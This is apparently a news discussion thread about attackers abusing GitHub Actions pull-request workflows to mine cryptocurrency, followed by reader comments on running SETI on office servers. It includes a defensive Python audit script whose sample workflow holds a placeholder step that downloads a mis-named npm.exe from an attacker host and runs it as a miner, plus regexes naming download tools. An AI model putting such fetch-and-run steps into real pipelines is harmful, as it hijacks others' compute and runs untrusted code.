GitHub Actions being actively abused to mine cryptocurrency on GitHub servers
GitHub Actions is currently being abused by attackers to mine cryptocurrency using GitHub's servers in an automated attack.
GitHub Actions is a CI/CD solution that makes it easy to automate all your software workflows and set up periodic tasks.
The particular attack adds malicious GitHub Actions code to repositories forked from legitimate ones, and further creates a Pull Request for the original repository maintainers to merge the code back, altering the original code. But an action is not required by the maintainer of the legitimate project for the attack to succeed.
BleepingComputer also observed that the malicious code loads a misnamed crypto miner, npm.exe, from GitLab and runs it with the attacker's wallet address. Additionally, after initially reporting on this incident, BleepingComputer has come across copycat attacks targeting more GitHub projects in this manner.
Here is how it works:
The attack involves first forking a legitimate repository that has GitHub Actions enabled. It then injects malicious code in the forked version, and files a Pull Request for the original repository maintainers to merge the code back. But, in an unexpected twist, the attack does not need the maintainer of the original project to approve the malicious Pull Request.
Perdok says that merely filing the Pull Request by the malicious attacker is enough to trigger the attack. This is especially true for GitHub projects that have automated workflows set up to validate incoming Pull Requests via Actions. As soon as a Pull Request is created for the original project, GitHub's systems would execute the attacker's code, which instructs GitHub servers to retrieve and run a crypto miner.
It looks like the validation of the Pull Request is what triggers execution of the cryptominer. I wonder how long GitHub Actions will run a task before killing it?
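The story describes the two ingredients a maintainer can check for: a workflow that runs automatically on every incoming Pull Request, and a step inside the PR's version of that workflow that fetches a binary from an external host and executes it. The following is an added example, not code from the article or from GitHub: a small audit script that scans a workflow file for those two signs. The sample workflow, the host name, the file name and the wallet value in it are constructed placeholders that mimic the shape of the attack, not the real indicators; the regexes only handle the single-line `run:` form, and a real review would also inspect multi-line `run: |` blocks.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample workflow (placeholder URL, file and wallet; not real IoCs).
# Shape follows the story: runs on every Pull Request, one step downloads a
# mis-named binary from an external host, the next step runs it with a wallet.
SAMPLE_WORKFLOW = """\
name: ci
on: [pull_request]
jobs:
  build:
    runs-on: windows-latest
    steps:
      - uses: actions/checkout@v2
      - run: npm install
      - run: curl -L -o npm.exe https://gitlab.example/ATTACKER_PLACEHOLDER/npm.exe
      - run: ./npm.exe -o pool.example:3333 -u WALLET_PLACEHOLDER
"""

# Common download tools seen in CI shell steps (shell and PowerShell).
DOWNLOADERS = re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr|certutil)\b", re.I)
# Any URL that is not on github.com itself.
EXTERNAL_URL = re.compile(r"https?://(?!github\.com/)[^\s'\"]+", re.I)
# A command (first token, or one after && ; |) that is a .exe binary.
EXEC_BINARY = re.compile(r"(?:^|&&|;|\|)\s*(?:\./|\.\\)?[\w.-]+\.exe\b", re.I)
# `on: [pull_request]` flow form, or a nested `pull_request:` / `pull_request_target:` key.
PR_TRIGGER = re.compile(r"^\s*(on:.*pull_request|pull_request(_target)?:)", re.M)


def run_steps(workflow_text: str) -> List[str]:
    """Return the commands of single-line `- run: ...` steps, in order."""
    return [m.group(1).strip()
            for m in re.finditer(r"^\s*-\s*run:\s*(.+)$", workflow_text, re.M)]


def triggers_on_pull_request(workflow_text: str) -> bool:
    """True if the workflow starts automatically when a Pull Request is opened."""
    return PR_TRIGGER.search(workflow_text) is not None


def audit_workflow(workflow_text: str) -> Dict[str, object]:
    """Flag run steps that fetch from outside GitHub or execute a binary.

    risk is "high" only when both conditions hold: the workflow runs on PRs
    (so a fork can trigger it) and a step downloads/executes something.
    """
    findings: List[Tuple[str, str]] = []
    for cmd in run_steps(workflow_text):
        if DOWNLOADERS.search(cmd) and EXTERNAL_URL.search(cmd):
            findings.append(("external-download", cmd))
        if EXEC_BINARY.search(cmd):
            findings.append(("runs-binary", cmd))
    pr_triggered = triggers_on_pull_request(workflow_text)
    return {
        "pr_triggered": pr_triggered,
        "findings": findings,
        "risk": "high" if pr_triggered and findings else "low",
    }


if __name__ == "__main__":
    report = audit_workflow(SAMPLE_WORKFLOW)
    print("PR-triggered:", report["pr_triggered"], "risk:", report["risk"])
    for kind, cmd in report["findings"]:
        print(f"  [{kind}] {cmd}")
```

Run against the sample, the script reports the workflow as PR-triggered with one external download and one binary execution, i.e. the exact combination the story says needs no maintainer approval to fire. The check is a review aid, not a gate: a PR that edits anything under `.github/workflows/` deserves a human look regardless, and limiting what automatically runs for pull requests from forks (or requiring maintainer approval before it runs) removes the free compute the attack depends on.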
(Score: 2) by legont on Tuesday April 06 2021, @12:29AM (3 children)
I had a few powerful idle servers at the office so I run SETI on them 24x7. Nobody ever asked anything. How does it differ from crypto mining I still wonder.
"Wealth is the relentless enemy of understanding" - John Kenneth Galbraith.
(Score: 0) by Anonymous Coward on Tuesday April 06 2021, @01:37AM
You aren't appropriating the resources of others for your own pecuniary benefit.
(Score: 2) by Unixnut on Tuesday April 06 2021, @08:53AM (1 child)
Well, to be fair, even nowadays running SETI (or BOINC) on office servers is considered bad practice, if not cause for disciplinary action.
The reasons it could have been done "once upon a time" are primarily:
1. Computers were not as good at power management as they are now. Whether a server was at 100% or mostly idle didn't result in a massive difference in the power bill or cooling costs, so nobody really noticed.
2. There was less general awareness of computer technology/security. Back in the 90's and 00's, the local sysadmin was very much "king of the hill" for the computers and servers, and could run things like SETI without the rest of the office knowing. Especially as it also worked as a screensaver.
3. Security was not such a big deal. Nowadays, if there is a compromise of the office, the company itself can be liable. They have security departments monitoring for things like bittorrent/crypto-miners/SETI/BOINC etc... and shutting them down. A compromise can be blamed on any one of these third party tools, even if they were not at fault, meaning there is a very high risk vs reward for running them on office machines.
Saying that, SETI/BOINC to my knowledge never had an issue of exploitation, which is impressive when you consider they work on the pretext of sending binary executables to people's machines in order to do local processing. Sending one compromised binary to thousands of machines at once must have been a juicy target.
Crypto-mining in that sense is a bit more secure, as you are not constantly pulling executables off the internet as part of the processing, but rather just calculating hashes that are sent to and fro. Still a risk because the crypto-miner itself needs to be downloaded off the internet itself.
(Score: 0) by Anonymous Coward on Wednesday April 07 2021, @02:17AM
SETI and BOINC are both open source. One reason why attacks on their infrastructure were relatively rare is because people compiled their own versions to squeeze out that little edge. They also routinely compared the result with the distributed version. In addition, most BOINC projects don't actually send the executable along for the ride in work units. "Applications" have their own secondary distribution system that is much more tightly controlled and there is "anonymous platform" support if you don't want to download executables at all.